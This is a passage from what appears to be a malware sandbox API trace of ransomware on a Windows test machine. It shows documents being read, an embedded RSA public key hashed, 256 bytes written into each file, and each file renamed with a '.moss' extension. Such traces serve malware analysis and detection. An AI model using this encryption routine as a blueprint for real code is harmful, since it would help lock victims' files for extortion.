KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.295] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.296] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.296] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.296] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.296] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.296] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.296] GetLastError () returned 0x0 [0172.296] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.296] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.296] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.296] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.296] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.296] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.297] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.297] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.297] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6ceb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.297] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.297] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\7Ecmz.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\7ecmz.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\7Ecmz.doc.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\7ecmz.doc.moss")) returned 1 [0172.299] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Fc4wgudkAiG_oWSy.rtf") returned=".rtf" [0172.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Fc4wgudkAiG_oWSy.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\fc4wgudkaig_owsy.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.300] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=76629) returned 1 [0172.300] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.304] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x12b2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.304] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.305] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.305] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x12b55, lpOverlapped=0x0) returned 1 [0172.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.306] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.306] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.307] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.307] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.307] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.307] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.307] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.307] GetLastError () returned 0x0 [0172.307] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.307] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.308] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.308] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.308] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.308] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.308] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.308] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.309] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x12b55, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.309] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.309] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Fc4wgudkAiG_oWSy.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\fc4wgudkaig_owsy.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\Fc4wgudkAiG_oWSy.rtf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\fc4wgudkaig_owsy.rtf.moss")) returned 1 [0172.312] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\FJTrYGIfGriZEdj.csv") returned=".csv" [0172.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\FJTrYGIfGriZEdj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\fjtrygifgrizedj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.312] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=24292) returned 1 [0172.312] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.316] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5ebe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.317] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.318] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5ee4, lpOverlapped=0x0) returned 1 [0172.318] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.318] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.318] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.319] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.320] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.320] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.320] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.320] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.320] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.320] GetLastError () returned 0x0 [0172.320] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.320] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.321] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.321] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.321] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.321] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.321] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.322] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5ee4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.322] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.322] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\FJTrYGIfGriZEdj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\fjtrygifgrizedj.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\FJTrYGIfGriZEdj.csv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\fjtrygifgrizedj.csv.moss")) returned 1 [0172.324] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\H5lMGA-.csv") returned=".csv" [0172.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\H5lMGA-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\h5lmga-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.325] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=16456) returned 1 [0172.325] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.329] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4022, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.329] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.330] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.330] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x4048, lpOverlapped=0x0) returned 1 [0172.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.330] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.330] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.330] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2eae0) returned 1 [0172.332] CryptCreateHash (in: hProv=0xd2eae0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.332] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.332] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.332] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.332] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.332] GetLastError () returned 0x0 [0172.332] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.332] CryptReleaseContext (hProv=0xd2eae0, dwFlags=0x0) returned 1 [0172.332] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.332] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.332] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.332] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.333] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.333] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.333] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x4048, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.333] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.333] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\H5lMGA-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\h5lmga-.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\H5lMGA-.csv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\h5lmga-.csv.moss")) returned 1 [0172.335] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\iENOEBYm.doc") returned=".doc" [0172.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NsI7Q_Ai4cQKUwAhGA5\\ZSqKO4y-pgVGUfXDhW\\iENOEBYm.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nsi7q_ai4cqkuwahga5\\zsqko4y-pgvgufxdhw\\ienoebym.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.335] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=78202) returned 1 [0172.335] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.339] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x13154, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.339] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: 